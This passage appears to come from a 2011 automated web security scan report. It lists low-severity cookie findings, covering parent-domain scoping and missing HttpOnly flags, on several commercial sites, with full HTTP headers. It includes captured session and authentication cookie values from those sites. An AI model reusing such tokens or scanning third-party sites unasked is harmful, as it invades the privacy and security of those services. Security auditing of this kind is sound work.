Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:49 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:49 GMT
Set-Cookie: arrowLat=1294837309101; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:49 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:49 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:49 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:49 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:54 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:49 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=986
Connection: Keep-Alive
Content-Length: 99322

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Mac - Fr
...[SNIP]...

10.23. http://download.cnet.com/mobile-downloads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /mobile-downloads/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile-downloads/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:50 GMT
Via: HTTP/1.0 phx1-rb-dl-app9.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:50 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:50 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:50 GMT
Set-Cookie: arrowLat=1294837310099; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:50 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:50 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:50 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:50 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:55 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:50 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=991
Connection: Keep-Alive
Content-Length: 78960

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Mobile -
...[SNIP]...

10.24. http://download.cnet.com/webware-apps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /webware-apps/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webware-apps/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:54 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app8.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:54 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:54 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:54 GMT
Set-Cookie: arrowLat=1294837313774; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:54 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:54 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:54 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:54 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:59 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:54 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 36086

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Webware
...[SNIP]...

10.25. http://download.cnet.com/windows/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /windows/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /windows/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:55 GMT
Via: HTTP/1.0 phx1-rb-dl-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:05:39 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Age: 136
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:55 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:55 GMT
Set-Cookie: arrowLat=1294837315852; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:55 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:55 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:55 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:55 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:00 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:55 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=909
Connection: Keep-Alive
Content-Length: 102759

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Free sof
...[SNIP]...

10.26. http://landesm.gfi.com/event-log-analysis-sm/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landesm.gfi.com
Path:   /event-log-analysis-sm/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event-log-analysis-sm/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 12 Jan 2011 03:46:07 GMT
Etag: "17424fa7bc85ec85fc725f2b8328bb89ca03be4c"
Server: TornadoServer/1.0
Set-Cookie: __ptcx=7uXan4.9hp3Sx.1; expires=Mon, 11 Jul 2011 03:46:07 GMT; Path=/
Set-Cookie: __pcid=7uXan4:1; Domain=.gfi.com; expires=Mon, 11 Jul 2011 03:46:07 GMT; Path=/
Content-Length: 30171
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Event log analysis &amp; management</title>

...[SNIP]...

10.27. http://www.zdnet.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 05:08:03 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:08:03 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 117305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

11. Cookie without HttpOnly flag set
There are 63 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



11.1. http://weeklyad.target.com/target/default.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://weeklyad.target.com
Path:   /target/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /target/default.aspx HTTP/1.1
Host: weeklyad.target.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=utf-8
Location: /target/default.aspx?action=entryflash&
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Content-Length: 166
Expires: Wed, 12 Jan 2011 04:16:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 04:16:11 GMT
Connection: close
Set-Cookie: SLHUID=UID=11011122161102414320608630493S&Version=1.65; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/
Set-Cookie: ShoppingListCount=0; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/
Set-Cookie: ShoppingList=; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/
Set-Cookie: SLHTrackingSessionID=11011122161102414320608630494S; expires=Wed, 12-Jan-2011 04:46:11 GMT; path=/
Set-Cookie: Prefs=LanguageID=1&SiteID=787&PRetailerID=-99880&OnlineServer=&OnlineSID=&tag=tcom-gbexpo71-20; path=/
Set-Cookie: SLHCookie=LanguageID=1; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/
Set-Cookie: DisplayMode=preferred=flash; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftarget%2fdefault.aspx%3faction%3dentryflash%26">here</a>.</h2>
</body></html>

11.2. http://www.43things.com/person/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.43things.com
Path:   /person/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:08:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4
X-Runtime: 0.01017
Cache-Control: no-cache
Set-Cookie: ubid=SV2zpKsaoTKvCsQCCVAPEBCrBaA%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: auth=pnAiy5OTmH8VYlJnGjHyFoBpPvpc4DPnYbLKjnQeNv9Q7ss4zO9i2gGP8aKM5xF9EY9nas978c%2BQyCXn8qgOvWb28tIflxH1k8TKgw8KLZE%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _session_id=29d6c53e1159bfde1f23b713b0b5d77e; domain=.43things.com; path=/
Content-Length: 13962
Status: 404 Not Found
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 13:08:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>43 Things</title>
<m
...[SNIP]...

11.3. http://www.admob.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.admob.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.admob.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:08:05 GMT
Server: Apache
Set-Cookie: session_cookie=bd074ecbb806244a67a03a6f2aac7d85; expires=Wed, 12-Jan-2011 15:08:05 GMT; path=/; domain=.admob.com
Set-Cookie: mrkting_landing_page_url=%2F; expires=Sat, 09-Jan-2021 13:08:05 GMT; path=/; domain=.admob.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!doctype html>
<html>
   <head>
       <title>Mobile Advertising | Buy Ads | Monetize Traffic | AdMob</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<met
...[SNIP]...

11.4. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Allure

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Allure HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:43 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000G-h5yYIX_fsCdYaaomzo48b:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:23 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YB%0aJl69zTeOdt0W%2fI1bQxUaXluBK4%2b4re%2bNGtxBIVjSxQMGJbwroUJ2uepbtFXi4W8%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419596%3atrue%3afalse%3a0%3aqFLccT2YrlnZwn4eqF9jLONT7P4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29783


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.5. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:38 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000xNqeoIoWgm7tfT4YP_0pvgw:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:29 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fCa%0adt0Ca5sgwGLGZRYgwcw9yVBAEI4l4WP6D%2flSrQrYmWvnSq3PAt9DJMCltsf9lks%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420003%3atrue%3afalse%3a0%3amAg2jXtkO5mMA5V5w%2f5pyYw%2fn1g%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 26827


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.6. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_BonAppetite

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_BonAppetite HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:51 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000tbdA8jKr2XFeez646mYyAzj:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:41 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0bb%0agmx%2fBKjEubD1u2lDzKNrp%2fxq%2fEh3zocUN0K08ospwh0L1bcod31%2fGhJWskPe%2bvA%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419605%3atrue%3afalse%3a0%3a6TUPgGq3ci7IPBw4tu5kSdECWw4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29951


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.7. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Brides

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Brides HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:48 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00004nur2b4AB8GyjoBhBXHJFNN:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:39 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Za%0aN8I5U1fIm%2bVXFNkHZc7mzEyRNk9R93bc3Z%2bj3WRLr%2f%2fLUA4vR9PWa%2b%2fqrTv2%2bGU%3d; Path=/
